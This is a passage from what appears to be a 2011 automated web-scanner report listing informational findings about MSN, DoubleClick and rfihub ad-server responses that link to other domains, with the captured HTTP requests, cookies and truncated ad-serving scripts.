Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2707
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8604359-T8395935-C77000000000046666
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:53 GMT
Content-Length: 2707


//<![CDATA[
function getRADIds() { return{"adid":"77000000000046666","pid":"8604359","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_704643172() {var adCode_704643172=new Array();adCode_704643172.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N805.msn/B5446506.12;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004C/77000000000046666.1?!&amp;&amp;PID=8604359&amp;UIT=G&amp;TargetID=8395935&amp;AN=704643172&amp;PG=INVHP1&amp;ASID=7f85b18df162410db4a57b3e104ca897&destination=;ord=704643172?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_704643172.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N805.msn/B5446506.12;abr=!ie;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.m
...[SNIP]...

19.5. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVNWS&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2420
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC06=FB=AgEAtw4Q67gB; expires=Thu, 25-Apr-2013 12:00:00 GMT; domain=.rad.msn.com; path=/; HttpOnly
X-RADID: P8446885-T39837451-C29000000000076906
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:55 GMT
Content-Length: 2420


//<![CDATA[
function getRADIds() { return{"adid":"29000000000076906","pid":"8446885","targetid":"39837451"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1225785918() {var adCode_1225785918=new Array();adCode_1225785918.push('<iframe src="http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_1225785918.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1225785918.push('document.write(\'<a href="http://clk.atdmt.com/NYC/go/296638382/direct;;wi.300;hi.250/01/" target="_blank"><img src="http://view.atdmt.com/NYC/view/296638382/direct;;wi.300;hi.250/01/"/></a>
...[SNIP]...

19.6. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVPC2&AP=1455 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 822
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7741908-T28253485-C80000000000018486
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:53 GMT
Content-Length: 822


//<![CDATA[
function getRADIds() { return{"adid":"80000000000018486","pid":"7741908","targetid":"28253485"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 1, 1);}
try
...[SNIP]...
<a href="http://g.msn.com/2AD0001R/80000000000018486.1??PID=7741908&amp;UIT=G&amp;TargetID=28253485&amp;AN=1245397708&amp;PG=INVPC2&amp;ASID=4f84f7872f60401bb680650f209eef07" target="_blank"><img src="http://a.ads2.msads.net/CIS/20/000/000/000/001/150.gif" width="1" height="1" alt="dot" border="0" /></a>
...[SNIP]...

19.7. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PG=CCHAPR&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37; FC01=FB=AgIAtw5ZB7gB3fW4AQ; FC05=FB=AgEAtw4P67gB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2005
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8588130-T8367343-C29000000000082620
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:40:28 GMT
Content-Length: 2005


//<![CDATA[
function getRADIds() { return{"adid":"29000000000082620","pid":"8588130","targetid":"8367343"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1074856784() {var adCode_1074856784=new Array();adCode_1074856784.push('<IFRAME MARGINWIDTH="0" MARGINHEIGHT="0" HEIGHT="250" FRAMEBORDER="0" WIDTH="300" SCROLLING="no" SRC="http://m.adnxs.com/tt?member=280&inv_code=CCHAPR&cb=1074856784"></IFRAME>
...[SNIP]...

19.8. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVHP1&AP=1089 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2399
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8008908-T8395935-C26000000000153628
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:48 GMT
Content-Length: 2399


//<![CDATA[
function getRADIds() { return{"adid":"26000000000153628","pid":"8008908","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_554238040() {var adCode_554238040=new Array();adCode_554238040.push('<iframe src="http://view.atdmt.com/BEL/iview/msnnksbu0010000337bel/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_554238040.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_554238040.push('document.write(\'<a href="http://clk.atdmt.com/BEL/go/msnnksbu0010000337bel/direct;/01/" target="_blank"><img src="http://view.atdmt.com/BEL/view/msnnksbu0010000337bel/direct;/01/"/></a>
...[SNIP]...

19.9. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVPC1&AP=1455 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgEAtw5ZB7gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 841
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8050733-T28253484-C50000000000031126
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:55 GMT
Content-Length: 841


//<![CDATA[
function getRADIds() { return{"adid":"50000000000031126","pid":"8050733","targetid":"28253484"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003K/50000000000031126.1??PID=8050733&amp;UIT=G&amp;TargetID=28253484&amp;AN=1076904057&amp;PG=INVPC1&amp;ASID=0c5cd3e8ee4f403fae63b5f9f1830bcb" target="_blank"><img src="http://a.ads2.msads.net/CIS/42/000/000/000/011/574.gif" width="300" height="60" alt="click here" border="0" /></a>
...[SNIP]...

19.10. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVXTA&AP=1440 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgEAtw5ZB7gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1281
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8614954-T30580561-C1693696
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:40:05 GMT
Content-Length: 1281


//<![CDATA[
var contents_86 = '<span><a target="_blank" href="http://g.msn.com/0AD00001/1693696.1?!&amp;&amp;PID=8614954&amp;UIT=G&amp;TargetID=30580561&amp;AN=1526858099&amp;PG=INVXTA">Join TD Ame
...[SNIP]...
</span><img src="http://ad.doubleclick.net/ad/N3941.msn/B5325532;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?" height="1" width="1" style="display:none;" />';
var fh_86 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

19.11. http://a.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=CP49HM&AP=1419 HTTP/1.1
Host: a.rad.msn.com
Proxy-Connection: keep-alive
Referer: http://home.autos.msn.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37; FC01=FB=AgIAtw5ZB7gB3fW4AQ; FC05=FB=AgEAtw4P67gB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 845
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P5837777-T10719622-C60000000000042166
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:41:15 GMT
Content-Length: 845


//<![CDATA[
function getRADIds() { return{"adid":"60000000000042166","pid":"5837777","targetid":"10719622"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 125);}

...[SNIP]...
<a href="http://g.msn.com/2AD0004C/60000000000042166.1??PID=5837777&amp;UIT=G&amp;TargetID=10719622&amp;AN=1613908638&amp;PG=CP49HM&amp;ASID=6833e66f72b54663bc7b2f11e7be9de6" target="_blank"><img src="http://a.ads2.msads.net/CIS/2/000/000/000/014/112.gif" width="300" height="125" alt="Click here!" border="0" /></a>
...[SNIP]...

19.12. http://a.rfihub.com/ca.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /ca.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ca.html?ra=8435996230.9279617241118103&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre8435996227678&pb=&pc=&pd=&pg=&ct=1303843599623 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=5058492012321.949?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEAcpLdw2F6J1UKMXA_aMRok; t=1303177639870; a2=2724386019227846218; t1=1303177640912; a=c614741349159218131; o=1-LUTRuF4-Pbpl; r=1303177638413; m="aAYCw2HtA==AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0="; u="aABWHF68w==AI89bBrQ==AAABL25eZA0="; f="aACMzXZKQ==AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c="; k="aACM4yRNg==ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0="; e=co

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: b="aABHuDlYw==AC82AAABL5MiUls=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: m="aAZi9tCwA==AE1783AAABL5MiUls=AI20473803AAABL25eZA0=AI20473803AAABL2uPV5g=AI20473803AAABL2uO-2o=AI20473803AAABL2uO0Aw=AI20473803AAABL2t9WLo=AI20473803AAABL2t7Sso=AI20473803AAABL2t7Ccw=AI20473803AAABL2t689Q=AI20473803AAABL2t5Lss=AI20473803AAABL2t4MZI=AI20473803AAABL2t4KCQ=AI20473803AAABL2t1-xQ=AI20473803AAABL2t1V3U=AI20473803AAABL2t1PoY=AI20473803AAABL2tyvMA=AI20473803AAABL2tynx8=AI20473803AAABL2tyZ9U=AI20473803AAABL2tyWc8=AI20473803AAABL2tyV4o=AI20473803AAABL2tyUIY=AI20473803AAABL2tyP8A=AI20473803AAABL2tyMOY=AI20473803AAABL2tyLJ0=AI20473803AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: u="aABIE89Tw==AI89bBrQ==AAABL5MiUls=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: f="aADA1bk1g==AK1303843590AB1AAABL5MiUls=AK1303226770AB1AAABL25eZA0=AK1303177638AC23AAABL2uPV5c=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: k="aADaAZB-w==AI-nca1783AN1303150295000AAABL5MiUls=ALnca20473803AN1299695883000AAABL25eZA0=AM-nca20473803AN1299695883000AAABL2twsg0=";Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Thu, 25-Oct-12 18:46:30 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1050

<html><body><img src="http://pixel.rubiconproject.com/tap.php?v=4140" border="0"
width="1" height="1">

<img src='http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTYxNyZ0bD0xNTc2ODAw' width='1' height='1' />
<img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1117&s=$t&l=1&t=i&e=1" width="1" height="1" border="0" >
<img src="http://www.googleadservices.com/pagead/conversion/1030878771/?label=Df9_CJfU3QEQs-zH6wM&amp;guid=ON&amp;script=0" width="1" height="1" border="0" alt="">
<img src="http://ad.yieldmanager.com/pixel?id=458789&t=2" width="1" height="1" />
<img border="0" hspace="0" vspace="0" width="1" height="1" src="http://bstats.adbrite.com/click/bstats.gif?kid=48027945&bapid=11748&uid=560800" />
<img src="http://ib.adnxs.com/seg?add=9175" width=1 height=1/>
<img src="http://ib.adnxs.com/pxj?bidder=18&action=setuids('614741349159218131','1CAESEAcpLdw2F6J1UKMXA_aMRok');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D" width="1" height="1">
</body>
...[SNIP]...

19.13. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:39:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7009

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Apr 21 18:16:05 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
AH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=http%3a%2f%2fwww.metropcs.com/android%3Futm_source%3DDART%26utm_medium%3DDisplay%252BMedia%26utm_campaign%3DMPCS%252BGM%252BQ2%252BInterim%252B%285403001%29"><img src="http://s0.2mdn.net/3095006/mpcs_040111_728x90_gm_android_1_fl.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

19.14. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=805437803&PG=INV4QC&ASID=ffd2abd4093544b9a0ee74b8349ad9b0&destination=;ord=805437803? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
